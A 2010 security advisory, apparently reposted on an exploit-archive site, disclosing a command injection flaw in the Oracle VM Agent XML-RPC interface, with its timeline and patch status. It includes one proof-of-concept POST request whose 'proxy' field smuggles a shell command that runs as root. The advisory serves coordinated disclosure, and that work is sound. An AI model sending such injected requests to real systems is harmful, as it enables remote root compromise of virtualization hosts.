Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtNahuel Grisolia1337DAY-ID-14467
HistoryOct 14, 2010 - 12:00 a.m.

Oracle Virtual Server Agent Command Injection

2010-10-1400:00:00
Nahuel Grisolia
0day.today
25
JSON

Exploit for unix platform in category remote exploits

=============================================
Oracle Virtual Server Agent Command Injection
=============================================

1. Advisory Information
Advisory ID: BONSAI-2010-0109
Date published: 2010-10-13
Vendors contacted: Oracle
Release mode: Coordinated release
 
2. Vulnerability Information
Class: Injection
Remotely Exploitable: Yes
Locally Exploitable: Yes
 
3. Software Description
Oracle VM is server virtualization software which fully supports both
Oracle and non-Oracle applications. Oracle VM offers scalable, low-cost
server virtualization that is three times more efficient than existing
server virtualization products from other vendors. Oracle has also
announced certification of key Oracle products including Oracle
Database, Oracle Fusion Middleware, Oracle Applications, and Oracle Real
Application Clusters with Oracle VM.
 
Oracle VM Manager communicates with Oracle VM Agent to create and manage
guests on an Oracle VM Server. Oracle VM Agent is installed and
configured during the installation of Oracle VM Server.
 
By default, Oracle VM Agent is executed, with a highly privileged user,
typically root.
 
4. Vulnerability Description
Injection flaws, such as SQL, OS, and LDAP injection, occur when
untrusted data is sent to an interpreter as part of a command or query.
The attacker’s hostile data can trick the interpreter into executing
unintended commands or accessing unauthorized data.
 
5. Vulnerable packages
We ran our tests using Oracle Virtual Server release 2.2.0 with Oracle
VM Agent 2.3.
 
6. Non-vulnerable packages
Patch set 2.2.1 and above
 
7. Credits
This vulnerability was discovered by Nahuel Grisolia ( nahuel -at-
bonsai-sec.com ).
 
8. Technical Description
8.1. OS Command Injection
CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Oracle VS Agent is prone to a remote command execution vulnerability
because the software fails to adequately sanitize user-supplied input.
Oracle VS Agent exposes through XML-RPC several functions. One of these
functions is validate_master_ip, which receives four parameters. The
second parameter "proxy", is vulnerable to command injection, because it
is not properly sanitized and its content is concatenated in an
operative system command, executed as a highly privileged user
(typically root).
The following POST message can be sent to the VM Agent XML-RPC port. By
doing this, the ping command is executed as follows:
 
POST /RPC2 HTTP/1.0
User-Agent: XML-RPC for PHP 3.0.0.beta
authorization: Basic XXXXXXXXXXXXXXX
Host: XXX.XXX.XXX.XXX:8899
Accept-Encoding: gzip, deflate
Accept-Charset: UTF-8,ISO-8859-1,US-ASCII
Content-Type: text/xml
Content-Length: 416
 
<?xml version="1.0"?>
<methodCall>
<methodName>utl_test_url</methodName>
<params>
<param>
<value><string>http://192.168.1.101</string></value>
</param>
<param>
<value><string>192.168.1.103'; ping –c 10 localhost; '</string></value>
</param>
<param>
<value><string>192.168.1.101</string></value>
</param>
<param>
<value><string>192.168.1.101</string></value>
</param>
</params>
</methodCall>
 
9. Report Timeline
 2010-09-24 / Bonsai provides vulnerability information to ORACLE
 2010-09-29 / Oracle confirms the vulnerability
 2010-10-12 / Oracle published Critical Patch Update Fix
 2010-10-13 / Public Disclosure



#  0day.today [2018-03-14]  #
JSON